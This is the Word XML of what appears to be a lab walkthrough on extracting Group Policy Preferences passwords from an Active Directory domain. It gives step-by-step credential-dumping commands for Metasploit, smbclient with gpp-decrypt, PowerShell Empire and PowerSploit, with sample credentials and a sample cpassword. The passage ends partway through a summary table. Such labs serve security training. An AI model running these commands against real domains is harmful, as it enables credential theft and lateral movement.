      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">Passwords are encrypted with a </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>known static AES key</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t>, making them easy to decrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690D26CD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve">This weakness allows attackers to </w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dump plaintext passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> from GPP XML files remotely or locally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389683D4" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="5026D9BB">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="014C3170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Lab Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63114BDC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Domain Controller: Windows Server 2019/2022/2024 (Active Directory enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29981D47" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Client Machines: Windows 10/12 domain-joined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA7F061" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Attacker Machine: Kali Linux (with Metasploit, PowerShell Empire, and other tools)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD8CF0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Network: VMs in Azure with SMB accessible internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D4828A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="7D7BA8A1">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A0E08B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Step 1: Exploit GPP via Metasploit SMB Enumeration (Remote)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D30A71" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prerequisite:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Know credentials of a valid domain user (e.g., raj:Ignite@123)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724451A3" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Metasploit auxiliary module smb_enum_gpp enumerates GPP XML files on Domain Controller via SMB, decrypts cpassword automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCCA15" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E168D0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>use auxiliary/scanner/smb/smb_enum_gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777EBD97" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set RHOSTS 192.168.1.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C3560" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set SMBUser raj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D896E4" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set SMBPass Ignite@123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24217BB3" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339357D2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Result: Displays decrypted passwords from GPP XML files such as Groups.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369CEC4E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="0C01368E">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D223E15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Step 2: Exploit GPP via Metasploit Post-Exploitation (Local)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B48BFC" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prerequisite:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> You have a Meterpreter session on a compromised machine inside the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B3303" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Metasploit post module post/windows/gather/credentials/gpp searches cached GPP files locally and remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90EC94" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0D896" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>use post/windows/gather/credentials/gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611BEC5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D061F5" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124ADE68" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Result: Finds and decrypts cpassword from paths like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42EC8F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>C:\ProgramData\Microsoft\Group Policy\History\{GUID}\Machine\Preferences\Groups\Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A0D4D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>C:\Windows\SYSVOL\sysvol\&lt;domain&gt;\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D3DA1" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="2596A80D">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="481230AA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Step 3: Manual Retrieval via SMB Client and Decrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE1C82A" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Connect to SYSVOL share with valid credentials via SMB client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC8EE5D" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>smbclient //192.168.1.103/SYSVOL -U raj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D5069" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Navigate to the GPP XML path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B291E7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>SYSVOL\sysvol\&lt;domain&gt;\Policies\{GPO-GUID}\Machine\Preferences\Groups\Groups.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049428E2" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Download Groups.xml to your local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F11109" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Decrypt cpassword using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3527632E" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gpp-decrypt</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> (Ruby script in Kali Linux):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4314BE8B" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>gpp-decrypt &lt;encrypted-cpassword&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDEA461" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3154D476" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gp3finder</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> (Python script):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6787B0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD3618" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="1FB9B29F">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA0F150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Step 4: Extract via PowerShell Empire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56658C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Gain a low privilege shell on a Windows host inside domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4982A3BF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use PowerShell Empire privesc/gpp module to extract plaintext GPP passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D0A1D7" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands in Empire:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DD8B92" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>agents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F405167" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>interact &lt;agent_name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617FD5CD" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>usemodule privesc/gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039FD35" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB384AA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Result: Displays plaintext passwords from GPP XML files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F54041" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="32064492">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAEE551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Step 5: Extract via PowerShell Script (PowerSploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA016E4" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Use PowerSploit module Get-GPPPassword.ps1 locally on a domain controller or domain-joined machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9AE0B9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAC0660" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>Import-Module .\Get-GPPPassword.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D83AA" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r w:rsidRPr="002B697B">
        <w:t>Get-GPPPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30F517" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:t>Output: Lists plaintext passwords from XML files such as Groups.xml, ScheduledTasks.xml, Services.xml, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40372F26" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="35816178">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20189CB3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Azure VM Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4034F9" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SYSVOL Accessible by Authenticated Users:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Default permission allows any authenticated user to read GPP XML files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193D2C45" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static AES Encryption Key:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Microsoft’s fixed AES key for cpassword encryption makes stored passwords trivial to decrypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD817A0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Exposure of SMB Ports:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Azure VMs often allow SMB traffic internally, enabling remote enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0F36AF" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cached Group Policy Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Cached on endpoints, allowing local extraction even if GPO deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B19E14" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lack of Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> No alerts on suspicious SYSVOL access or lateral movement using dumped credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A628C" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B697B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weak Password Hygiene:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B697B">
        <w:t xml:space="preserve"> Passwords may be reused or weak, facilitating further compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B73634F" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="00C311DB">
      <w:r>
        <w:pict w14:anchorId="3F84F68F">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B5AE5B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Summary Table of Tools and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1775"/>
        <w:gridCol w:w="4747"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C311DB" w:rsidRPr="002B697B" w14:paraId="56B7303F" w14:textId="77777777" w:rsidTr="003955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EBF09" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697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A239E46" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Prerequisite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="237BD3C0" w14:textId="77777777" w:rsidR="00C311DB" w:rsidRPr="002B697B" w:rsidRDefault="00C311DB" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B697B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Commands / Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
